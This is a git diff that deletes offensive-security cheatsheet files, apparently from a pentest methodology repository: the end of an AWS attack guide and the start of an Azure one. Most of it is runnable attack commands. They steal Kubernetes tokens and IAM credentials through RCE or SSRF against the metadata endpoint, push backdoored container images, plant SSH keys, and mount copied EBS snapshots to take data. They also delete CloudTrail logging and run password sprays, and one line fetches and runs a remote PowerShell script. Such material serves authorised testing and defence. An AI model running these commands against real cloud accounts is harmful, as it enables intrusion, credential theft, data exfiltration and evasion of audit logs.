cluster -* Always look how VPC's are communicatig with each other, maybe is possible to pivot through the EKS VPC from other VPC and compromise the entire cluster - -## Initial Access - -* The initial access can be done by exploiting some RCE in webapp to get access to the container, afterwards its possible to compromise the EC2. - -After the RCE, we can list all secrets in EKS - -``` -https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount -``` - -### Getting the secret information from EKS - -``` -https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount/token -``` - -* It's also possible to do sandbox escaping (Tool: ``deepce``) - -## Enumeration - -### ECR - -#### Listing all repositories in container registry - -``` -aws ecr describe-repositories -``` - -#### Listing information about repository policy - -``` -aws ecr get-repository-policy --repository-name name -``` - -#### Listing all images in a specific repository - -``` -aws ecr list-images --repository-name name -``` - -#### Listing information about an image - -``` -aws ecr describe-images --repository-name name --images-ids imageTag=name -``` - -### ECS - -#### Listing all ECS clusters - -``` -aws ecs list-clusters -``` - -#### Listing information about an specific cluster - -``` -aws ecs describe-clusters --cluster name -``` - -#### Listing all services in specified cluster - -``` -aws ecs list-services --cluster name -``` - -#### Listing information about an specific service - -``` -aws ecs descibe-services --cluster name --services name -``` - -* This command shows the logs of the service - -#### Listing tasks in specific cluster - -``` -aws ecs list-tasks --cluster name -``` - -#### Listing information about an specific task - -``` -aws ecs describe-tasks --cluster name -tasks taskArn -``` - -* Also shows information about network, userful if trying to pivot - -#### Listing all containers in specified cluster - -``` -aws ecs list-container-instances --cluster name -``` - -### EKS - -#### Listing all EKS clusters - -``` -aws eks list-clusters -``` - -#### Listing information about an specific cluster - -``` -aws eks describe-cluster --name name -``` - -#### Listing all node groups in specified cluster - -``` -aws eks list-nodegroups --cluster-name name -``` - -#### Listing specific information about a node group in a cluster - -``` -aws eks describe-nodegroup --cluster-name name --nodegroup-name name -``` - -#### Listing Fargate in specified cluster - -``` -aws eks list-fargate-profiles --cluster-name cluster-name -``` - -#### Listing information about a fargate profile in a cluster - -``` -aws eks describe-fargate-profiles --cluster-name name --fargate-profile-name name -``` - -## Persistence - -* It's possible to modify an existing docker image with a backdoor, when this image is used it will trigger our team server. - -### Enumerating the user - -``` -aws sts get-caller-identity -``` - -### Listing manager policies attached to the IAM role - -``` -aws iam list-attached-role-policies --role-name name -``` - -### Getting information about the version of the managed policy - -``` -aws iam get-policy-version --policy-arn arn --version-id id -``` - -### Getting information about the repositories in container registry - -``` -aws ecr describe-repositories -``` - -### Listing all images in the repository - -``` -aws ecr list-images --repository-name name -``` - -### Listing information about an image - -``` -aws ecr describe-images --repository-name name --image-ids imageTag=Name -``` - -### Authenticate the docker daemon to ECR - -``` -aws ecr get-login-password --region region | docker login --username AWS --password-stdin ecr_address -``` - -### Building images with backdoor - -``` -docker build -t image_name -``` - -### Tagging the docker image - -``` -docker tag image_name ecr_addr:Image_Name -``` - -### Pushing the image to ECR - -``` -docker push ecr_addr:Image_Name -``` - -## EC2 - -* AMI, images used to create virtual machines -* It's possible to create a malicious image to compromise users -* We can access an instance using SSH Keys, EC2 Instance Connect, Session Manager -* The SSH Key method is permanent, we need to gather the private key to connect to the instance -* EC2 Instance connect is an IAM right that we can add to a user, enabling us to temporarily connect to an instance -* Session manager only work in browser and it does not need SSH Key -* Windows machines can be accessed by using RDP, Session Manager -* Security Groups acts as a virtual firewall to control inbound and outbound traffic, acts at the instance level, not the subnet level. - -## Enumeration - -### Listing information about all instances - -``` -aws ec2 describe-instances -``` - -### Listing information about a specific region - -``` -aws ec2 describe-instances --region region -``` - -### Listing information about specific instance - -``` -aws ec2 describe-instances --instance-ids ID -``` - -### Extracting UserData attribute of specified instance - -``` -aws ec2 describe-instance-attribute --attribute userData --instance-id instanceID -``` - -*This command gathers the metadata from the instance, like commands or secrets. The output is base64 encoded* - -### Listing roles of an instance - -``` -aws ec2 describe-iam-instance-profile-associations -``` - -## Exploitation -* Initial access can happen by RCE or SSRF -* Metadata can be used to exfiltrate information from the instance - -### Remote code execution - -#### AWS Metadata -If we have remote code execution or SSRF, we can grab metadata information - -``` -curl http://169.254.169.254/latest/meta-data -``` - -##### Grabbing the keys to access the instance - -``` -curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance -``` - -##### Grabbing the keys in metadata version 2 - -```bash -TOKEN=`curl -X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` -&& curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/meta-data/ -``` - -#### AWS Userdata - -Version 1 - -``` -curl http://169.254.169.254/latest/user-data/ -``` - -Version 2 - -```bash -TOKEN=`curl -X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` -&& curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/user-data/ -``` - -### Privilege Escalation -* One approach to get a shell in a instance is to put a reverse shell in UserData attribute, when the instance is launched, we will have the connection. -* Another approach happens when we have the iam:PassRole and iam:AmazonEC2FullAccess permissions, we can add an administrator role to the compromised EC2 instance and access aws services. - -#### Getting information about the key - -``` -aws sts get-caller-identity -``` - -#### Getting policies attached to the IAM user - -``` -aws iam list-attached-user-policies --user-name user_name -``` - -#### Getting information about a specific policy version - -``` -aws iam get-policy-version --policy-arn ARN --version-id ID -``` - -To attach a role to an EC2 instance, we can use the RCE to grab the ID - -``` -curl http://169.254.169.254/latest/meta-data/instance-id -``` - -#### Listing instance profiles - -``` -aws iam list-instance-profiles -``` - -#### Attach an instance profile to an EC2 instance - -``` -aws ec2 associate-iam-instance-profile --instance-id ID --iam-instance-profile Name=ProfileName -``` - -### Credential Access - -* We can grab the credentials by abusing metadata (Web Application with SSRF,RCE and so on) - -#### After the initial access -1. Enumerate the key (Role) - -``` -aws sts get-caller-identity -``` - -2. If there are roles associated with the key, we can grab the credentials by issuing a request to the metadata endpoint (v1 or v2) - -``` -curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_OF_PREVIOUS_COMMAND -``` - -3. Configure the aws cli - -``` -aws configure -``` - -Or use enviroment variables. - -### Persistence -* All the persistence techniques works here, SSH persistence, vim backdoor and so on. - -#### SSH Persistence example - -1. Generate SSH Key pair - -``` -ssh-keygen -``` - -2. Add public key to authorized_keys - -``` -echo "PUBLIC_Key" >> /home/user/.ssh/authorized_keys -``` - -3. Use the private key to connect - -``` -ssh -i public_key user@instance -``` - -# Elastic Block Store -* Block storage system used to store persistent data -* It's possible to attach this drive to EC2 and increase the storage (Like and HD, but scalable). -* It's possible to create a snapshot (It will be saved on S3) and create a volume from this snapshot. -* It's possible to attach the snapshot (Backup of BS) to an EC2 instance -* Snapshots can be used as volumes or AMI's - -## Enumeration - -### Enumerating EBS volumes - -``` -aws ec2 describe-volumes -``` - -* If the volume is available, it can be attached to an EC2 instance -* Check if the EBS is encrypted - -### Enumerating Snapshots - -``` -aws ec2 describe-snapshots --owner-ids self -``` - -* Also check if the snapshot is encrypted - -## Exploitation & Data Exfiltration -* Create a snapshot of an EC2 instance, create a volume from snapshot and attach to other EC2 instance. -* User need to have IAM permissions on EC2 -* Maybe we don't have the right to access the instance but have rights to create a snapshot and attach it to another machine. - -### Creating a snapshot of a specified volume - -``` -aws ec2 create-snapshot --volume volumeID --description "Example" --profile profile_name -``` - -### Listing snapshots - -``` -aws ec2 describe-snapshots -``` - -### Creating a volume from a snasphot - -``` -aws ec2 create-volume --snapshot-id ID --availability-zone ZONE --profile profile_name -``` - -* The volume needs to be in the same availability zone as the instance we have access - -### Attaching the volume to an instance - -``` -aws ec2 attach-volume --volume-id VolumeID --instance-id InstanceID --device /dev/sdfd -> Can be other value -``` - -### Mounting the volume - -``` -sudo mount /dev/sdfd /directory -``` - -After mounting, we will have access to the disk. - -# RDS - Relational Database Service - -* Service to use, operate and scale relational databases in AWS (MariaDB, MySQL and similar) -* The access is done by using password, password+IAM or password+kerberos -* It's possible to restrict access using restriction such as specific EC2 or lambda or use network level restriction such as vpc, ip. -* RDS Proxy hadles the traffic between the application and the database, it enables the enforcing of IAM permissions and use secrets manager to store credentials. - -## Enumeration - -### Listing information about clusters in RDS - -``` -aws rds describe-db-clusters -``` - -### Listing information about RDS instances - -``` -aws rds describe-db-instances -``` - -* IAMDatabaseAuthenticationEnabled: false -> Need password to access the instance - -### Listing information about subnet groups in RDS - -``` -aws rds describe-db-subnet-groups -``` - -### Listing information about database security groups in RDS - -``` -aws rds describe-db-security-groups -``` - -### Listing information about database proxies - -``` -aws rds describe-db-proxies -``` - -## Data exfiltration - -* If the instance is in a security group or VPC, we need to compromise it first to access the database (For example, we compromise an EC2 instance in the same VPC, then its possible to connect) - -### List instances in RDS - -``` -aws rds describe-db-instances -``` - -### List information about the specified security group - -``` -aws ec2 describe-security-groups --group-ids id -``` - -### Password based authentication - -``` -mysql -h hostname -u name -P port -p password -``` - -### IAM Based authentication - -**1. Identify the user** - -``` -aws sts get-caller-identity -``` - -**2. List all policies attached to a role** - -``` -aws iam list-attached-role-policies --role-name name -``` - -**3. Get information about a specific version of a policy** - -``` -aws iam get-policy-version --policy-arn arn --version-id ID -``` - -**4. Get a temporary token from the RDS** - -``` -aws rds generate-db-auth-token --hostname hostname --port port --username username --region region -``` - -* To be easier, we can put it in a variable - -``` -TOKEN=$(aws rds generate-db-auth-token --hostname hostname --port port --username username --region region) -``` - -**5. Connect to the DB using the token** - -``` -mysql -h hostname -u name -P port --enable-cleartext-plugin --user=user --password=$TOKEN -``` - -## SSO & Other Services - -## Single Sign On (SSO) - -* Used to centrally manage access to multiple AWS accounts and applications. -* Provide users a way to interact with all services and applications through one place -* Can be used to manage access and user permissions to all AWS accounts -* The identity source can use AWS SSO's identity store or external identity store (Okta,SAML and similar) - -## CloudTrail - -* Log monitoring service, allow us to continuously monitor and retain account activity related to actions in our AWS account -* Provide event history of AWS account activity, SDKs, command line tools and other services -* Commonly used to detect unsual behavior in AWS account -* Pacu automatically changes the user agent to deceive the logs of cloudtrail - -### Userful Commands - -#### List trails - -``` -aws cloudtrail list-trails -``` - -#### Disabling CloudTrail - -``` -aws cloudtrail delete-trail --name example_trail --profile name -``` - -#### Disable monitoring of events from global events - -``` -aws cloudtrail update-trail --name example_trail --no-include-global-service-event -``` - -#### Disable CloudTrail on specific regions - -``` -aws cloudtrail update-trail --name example_trail --no-include-global-service-event --no-is-multi-region --region=eu-west -``` - -## AWS Shield - -* Used to protect services from Denial of Service Attacks -* There are 2 versions, the standard and the Advanced - -## AWS Waf - -* Used to protect applications against common web application attacks -* Common WAF bypasses can be tested against it -* To detect an WAF, we can use `wafw00f` - -## AWS Inspector - -* Automated security assessment service that helps improve the security and compliance of applications on AWS -* Works with an agent - -## AWS Guard Duty - -* Threat detection service that monitors for malicious activity and unauthorized behavior -* Works by collecting and analyzing logs - -## Virtual Private Cloud - -* Used to create an isolated infrastructure within the cloud, including subnets and so on. -* If the VPC has an internet gateway, means its a public subnet -* Every VPC can have Network ACL's - -## Routing Tables - -A set of rules to determine where the traffic will be directed, comes in form of Destination and Target, defined as follows - -``` -DESTINATION TARGET - -IP local -> VPC Internal -IP igw -> Internet Gateway -IP nat -> NAT Gateway -IP pcx -> VPC Peering -IP vpce -> VPC Endpoint -IP vgw -> VPN Gateway -IP eni -> Network Interface -``` - -* VPC Internal -> Internal IP, no internet connection -* Internet Gateway -> Used to access the internet -* NAT Gateway -> Does the NAT between machines, allows one way connection to the internet -* VPC Peering -> Allows the communication between 2 VPC's -* VPC Endpoint -> Used to access aws services without internet connection (Internet Gateway) -* VPN Gateway -> Used to expand the cloud to on premises and vice-versa -* Network Interface -> Network Interfaces - -## Enumeration - -### Listing VPC's - -``` -aws ec2 describe-vpcs -``` - -### Listing VPC's specifing the region - -``` -aws ec2 describe-vpcs --region us-west-1 -``` - -### Listing VPC information by ID - -``` -aws ec2 describe-vpcs --filters "Name=vpc-id,Values=ID" -``` - -### Listing subnet's - -``` -aws ec2 describe-subnets -``` - -### Listing subnet's by VPC-id - -``` -aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID" -``` - -### Listing routing tables - -``` -aws ec2 describe-route-tables -``` - -### Listing routing tables by VPC-id - -``` -aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID" -``` - -### Listing Network ACL's - -``` -aws ec2 describe-network-acls -``` - -## Lateral Movement and Pivoting - -* We can abuse VPC peering to do lateral movement - -### Scenario - -* There are 3 VPC's -> A,B,C -* A can access B through peering and B access C. We can use VPC B as a peering pivot to access VPC C from VPC A. -* The lateral movement can be done if we gather keys or other machines -* Always enumerate the subnets to see in which subnet we can access other VPC's - -#### Listing VPC peering connections - -``` -aws ec2 describe-vpc-peering-connections -``` - -#### Listing subnets of specific VPC (Important because the access can be restricted to specific subnets to other VPC's) - -``` -aws ec2 describe-subnets --filters "Name=vpc-id,Values=ID" -``` - -#### Listing routing tables - -``` -aws ec2 describe-route-tables --filters "Name=vpc-id,Values=ID" -``` - -#### Listing instances on the specified VPC ID - -``` -aws ec2 describe-instances --filters "Name=vpc-id,Values=ID" -``` - -#### Listing instances on the specified subnet - -``` -aws ec2 describe-instances --filters "Name=subnet-id,Values=ID" -``` - -## References - -* [An introduction to penetration testing AWS - Akimbocore](https://akimbocore.com/article/introduction-to-penetration-testing-aws/) -* [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/) -* [My arsenal of AWS Security tools - toniblyx](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) -* [AWS Privilege Escalation method mitigation - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) -* [AWS CLI Cheatsheet - apolloclark](https://gist.github.com/apolloclark/b3f60c1f68aa972d324b) -* [Pacu Open source AWS Exploitation framework - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/) -* [PACU Spencer Gietzen - 30 juil. 2018](https://www.youtube.com/watch?v=XfetW1Vqybw&feature=youtu.be&list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5) -* [Cloud security instance metadata - PumaScan](https://pumascan.com/resources/cloud-security-instance-metadata/) -* [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6) -* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) -* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) -* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) -* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) -* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) -* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) -* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md deleted file mode 100644 index c327ac0..0000000 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ /dev/null @@ -1,1227 +0,0 @@ -# Cloud - Azure - -## Summary - -* [Azure Recon Tools](#azure-recon-tools) -* [Authenticating to the Microsoft Graph API in PowerShell](#authenticating-to-the-microsoft-graph-api-in-powershell) - * [Graph API Refresh Token](#graph-api-refresh-token) - * [Graph API Access Token](#graph-api-access-token) -* [Terminology](#terminology) -* [Training](#training) -* [Enumeration](#enumeration) - * [Enumerate valid emails](#enumerate-valid-emails) - * [Enumerate Azure Subdomains](#enumerate-azure-subdomains) - * [Enumerate tenant with Azure AD Powershell](#enumerate-tenant-with-azure-ad-powershell) - * [Enumerate tenant with Az Powershell](#enumerate-tenant-with-az-powershell) - * [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli) - * [Enumerate manually](#enumerate-manually) - * [Enumeration methodology](#enumeration-methodology) -* [Phishing with Evilginx2](#phishing-with-evilginx2) -* [Illicit Consent Grant](#illicit-consent-grant) - * [Register Application](#register-application) - * [Configure Application](#configure-application) - * [Setup 365-Stealer (Deprecated)](#setup-365-stealer-deprecated) - * [Setup Vajra](#setup-vajra) -* [Device Code Phish](#device-code-phish) -* [Token from Managed Identity](#token-from-managed-identity) - * [Azure API via Powershell](#azure-api-via-powershell) - * [Azure API via Python Version](#azure-api-via-python-version) - * [Get Tokens](#get-tokens) - * [Use Tokens](#use-tokens) - * [Refresh Tokens](#refresh-token) -* [Stealing Tokens](#stealing-tokens) - * [Stealing tokens from az cli](#stealing-tokens-from-az-cli) - * [Stealing tokens from az powershell](#stealing-tokens-from-az-powershell) -* [Add Credentials to All Enterprise Applications](#add-credentials-to-all-enterprise-applications) -* [Spawn SSH for Azure Web App](#spawn-ssh-for-azure-web-app) -* [Azure Storage Blob](#azure-storage-blob) - * [Enumerate blobs](#enumerate-blobs) - * [SAS URL](#sas-url) - * [List and download blobs](#list-and-download-blobs) -* [Runbook Automation](#runbook-automation) - * [Create a Runbook](#create-a-runbook) - * [Persistence via Automation accounts](#persistence-via-automation-accounts) -* [Virtual Machine RunCommand](#virtual-machine-runcommand) -* [KeyVault Secrets](#keyvault-secrets) -* [Pass The Certificate](#pass--the-certificate) -* [Pass The PRT](#pass-the-prt) -* [Intunes Administration](#intunes-administration) -* [Dynamic Group Membership](#dynamic-group-membership) -* [Administrative Unit](#administrative-unit) -* [Deployment Template](#deployment-template) -* [Application Proxy](#application-proxy) -* [Conditional Access](#conditional-access) -* [Azure AD](#azure-ad) - * [Azure AD vs Active Directory](#azure-ad-vs-active-directory) - * [Password Spray](#password-spray) - * [Convert GUID to SID](#convert-guid-to-sid) -* [Azure AD Connect ](#azure-ad-connect) - * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction) - * [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync) - * [Azure AD Connect - Seamless Single Sign On Silver Ticket](#azure-ad-connect---seamless-single-sign-on-silver-ticket) -* [References](#references) - -## Azure Recon Tools - -* [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound - ```powershell - # First, retrieve a refresh token (-r) if username/password isn't supported. - # An access token (-j) isn't recommended because it can expire before the end of azurehound execution - Install-Module AADInternals -Scope CurrentUser - Import-Module AADInternals - $rt = (Get-AADIntAccessToken -ClientId "1950a258-227b-4e31-a9cf-717495945fc2" -Resource "https://graph.microsoft.com" -PRTToken (Get-AADIntUserPRTToken) -IncludeRefreshToken $true)[1] - - # Second, launch azurehound collector - ./azurehound -r "0.AXMAMe..." list --tenant "753a0bc5-..." -o output.json - - ## Connects on your Azure account using the refresh token provided and the tenant of the account - ## and collects every possible objects in contoso.microsoft.com. Results are stored in json - ./azurehound -r $rt --tenant "contoso.onmicrosoft.com" list -o azurehound-scan.json --tenant "contoso.microsoft.com" - ## Sets configuration file with connection variables and other things (not required) - ./azurehound configure - ## Collects every objects on all accessible tenants using username/password and prints it to stdout - ./azurehound -u "MattNelson@contoso.onmicrosoft.com" -p "MyVerySecurePassword123" --tenant "contoso.onmicrosoft.com" list - ## Collects every objects on a specific tenant using username/password and stores it in json - ./azurehound -u "phisheduser@contoso.onmicrosoft.com" -p "Password1" list -o initial-scan.json --tenant "contoso.onmicrosoft.com" - ## Collects every objects on all tenants accessible using Service Principal secret - ./azurehound -a "6b5adee8-..." -s "" --tenant "contoso.onmicrosoft.com" list - ## Collects AzureAD info (all except AzureRM info) using JWT access token - ./azurehound -j "ey..." --tenant "contoso.onmicrosoft.com" list az-ad - ## Collects every users using refresh token - ./azurehound -r "0.ARwA6Wg..." --tenant "contoso.onmicrosoft.com" list users - - # List of collections - az-ad: Collect all information available at the AzureAD tenant level. In most tenants, all users have the ability to read all this information by default. - az-rm: Collect all information available at the AzureRM subscription level. Users do not by default have read access to any of this information. - - apps: Collects AzureAD application registration objects. - devices: Collects AzureAD devices regardless of join type. - groups: Collects AzureAD security-enabled groups, both role eligible and non role eligible. - key-vaults: Collects AzureRM key vaults. - management-groups: Collects AzureRM management group objects - resource-groups: Collects AzureRM resource group objects - roles: Collects AzureAD admin role objects - service-principals: Collects AzureAD service principals - subscriptions: Collevts AzureRM subscriptions - tenants: Collevts AzureAD tenant objects - users: Collects AzureAD users, including any guest users in the target tenant. - virtual-machines: Collects AzureRM virtual machines - - # GUI access - bolt://localhost:7687 - Username: neo4j - Password: BloodHound - - # Custom Queries : https://hausec.com/2020/11/23/azurehound-cypher-cheatsheet/ - # Cypher query examples: - MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p - MATCH (n) WHERE n.azname IS NOT NULL AND n.azname <> "" AND n.name IS NULL SET n.name = n.azname - ``` -* [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit - ```ps1 - . .\BARK.ps1 - $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" - $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" - $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress - ``` -* [**ROADTool**](https://github.com/dirkjanm/ROADtools) - The Azure AD exploration framework. - ```powershell - pipenv shell - roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout] - roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa] - roadrecon auth -u test@.onmicrosoft.com -p - roadrecon gather - roadrecon gui - ``` -* [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - Azure Red Team tool for graphing Azure and Azure Active Directory objects - ```powershell - # session 1 - backend - pipenv shell - python ssbackend.pyz - - # session 2 - frontend - cd C:\Tools\stormspotter\frontend\dist\spa\ - quasar.cmd serve -p 9091 --history - - # session 3 - collector - pipenv shell - az login -u test@.onmicrosoft.com -p - python C:\Tools\stormspotter\stormcollector\sscollector.pyz cli - - # Web access on http://localhost:9091 - Username: neo4j - Password: BloodHound - Server: bolt://localhost:7687 - ``` -* [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites -* [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) : Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks. - ```powershell - # You should use an account with at least read-permission on the assets you want to access - PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File - PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT - PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 - PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 - # resolve the TenantID for an specific username - PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com - ``` -* [**FSecureLABS/Azurite Explorer**](https://github.com/FSecureLABS/Azurite) and **Azurite Visualizer** : Enumeration and reconnaissance activities in the Microsoft Azure Cloud. - ```powershell - git submodule init - git submodule update - PS> Import-Module AzureRM - PS> Import-Module AzuriteExplorer.ps1 - PS> Review-AzureRmSubscription - PS> Review-CustomAzureRmSubscription - ``` -* [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping - ```powershell - PS C:> Import-Module .\MicroBurst.psm1 - PS C:> Import-Module .\Get-AzureDomainInfo.ps1 - PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose - ``` -* [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins. - Require: - - Read-Only permissions over Azure Directory (Tenant) - - Read-Only permissions over Subscription - - Require AZ and AzureAD module or administrator right - - ```powershell - $ powershell -ExecutionPolicy Bypass -NoProfile - PS C> Import-Module .\SkyArk.ps1 -force - PS C> Start-AzureStealth - PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1') - PS C> Scan-AzureAdmins -* [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security - ```powershell - # Require az module ! - $ ipmo .\PowerZure - $ Set-Subscription -Id [idgoeshere] - - # Reader - $ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails - - # Contributor - $ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami" - $ Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml" - $ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents - $ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk - - # Owner - $ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest - - # Administrator - $ Create-Backdoor, Execute-Backdoor - ``` - -## Authenticating to the Microsoft Graph API in PowerShell - -* [Microsoft Applications ID](https://learn.microsoft.com/fr-fr/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in) - -| Name | GUID | -|----------------------------|--------------------------------------| -| Microsoft Azure PowerShell | 1950a258-227b-4e31-a9cf-717495945fc2 | -| Microsoft Azure CLI | 04b07795-8ddb-461a-bbee-02f9e1bf7b46 | -| Portail Azure | c44b4083-3bb0-49c1-b47d-974e53cbdf3c | - - -### Graph API Refresh Token - -Authenticating to the Microsoft Graph API in PowerShell - -```ps1 -$body = @{ - "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" - "resource" = "https://graph.microsoft.com" # Microsoft Graph API -} -$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" -$Headers=@{} -$Headers["User-Agent"] = $UserAgent -$authResponse = Invoke-RestMethod ` - -UseBasicParsing ` - -Method Post ` - -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" ` - -Headers $Headers ` - -Body $body -$authResponse -``` - -### Graph API Access Token - -This request require getting the Refresh Token. - -```ps1 -$body=@{ - "client_id" = "1950a258-227b-4e31-a9cf-717495945fc2" - "grant_type" = "urn:ietf:params:oauth:grant-type:device_code" - "code" = $authResponse.device_code -} -$Tokens = Invoke-RestMethod ` - -UseBasicParsing ` - -Method Post ` - -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" ` - -Headers $Headers ` - -Body $body -$Tokens -``` - - - -## Terminology - -> Basic Azure AD terminologies - -* **Tenant**: An instance of Azure AD and represents a single organization. -* **Azure AD Directory**: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources. -* **Subscriptions**: It is used to pay for services. There can be multiple subscriptions in a Directory. -* **Core Domain**: The initial domain name .onmicrosoft.com is the core domain. It is possible to define custom domain names too. - - -## Training - -* AzureGoat : A Damn Vulnerable Azure Infrastructure - https://github.com/ine-labs/AzureGoat - - -## Enumeration - -### Enumerate valid emails - -> By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute. - -* Validate email - ```powershell - PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt - admin@.onmicrosoft.com - VALID - root@.onmicrosoft.com - INVALID - test@.onmicrosoft.com - VALID - contact@.onmicrosoft.com - INVALID - ``` -* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon - -#### Password spraying - -```powershell -PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1 -PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password -Verbose -``` - -### Enumerate Azure Subdomains - -```powershell -PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1 -PS> Invoke-EnumerateAzureSubDomains -Base -Verbose -Subdomain Service ---------- ------- -.mail.protection.outlook.com Email -.onmicrosoft.com Microsoft Hosted Domain -``` - -### Enumerate tenant with Azure AD Powershell - -```powershell -Import-Module C:\Tools\AzureAD\AzureAD.psd1 -Import-Module C:\Tools\AzureADPreview\AzureADPreview.psd1 -PS> $passwd = ConvertTo-SecureString "" -AsPlainText -Force -PS> $creds = New-Object System.Management.Automation.PSCredential("test@.onmicrosoft.com", $passwd) -PS Az> Connect-AzureAD -Credential $creds - -PS AzureAD> Get-AzureADUser -All $true -PS AzureAD> Get-AzureADUser -All $true | select UserPrincipalName -PS AzureAD> Get-AzureADGroup -All $true -PS AzureAD> Get-AzureADDevice -PS AzureAD> Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global 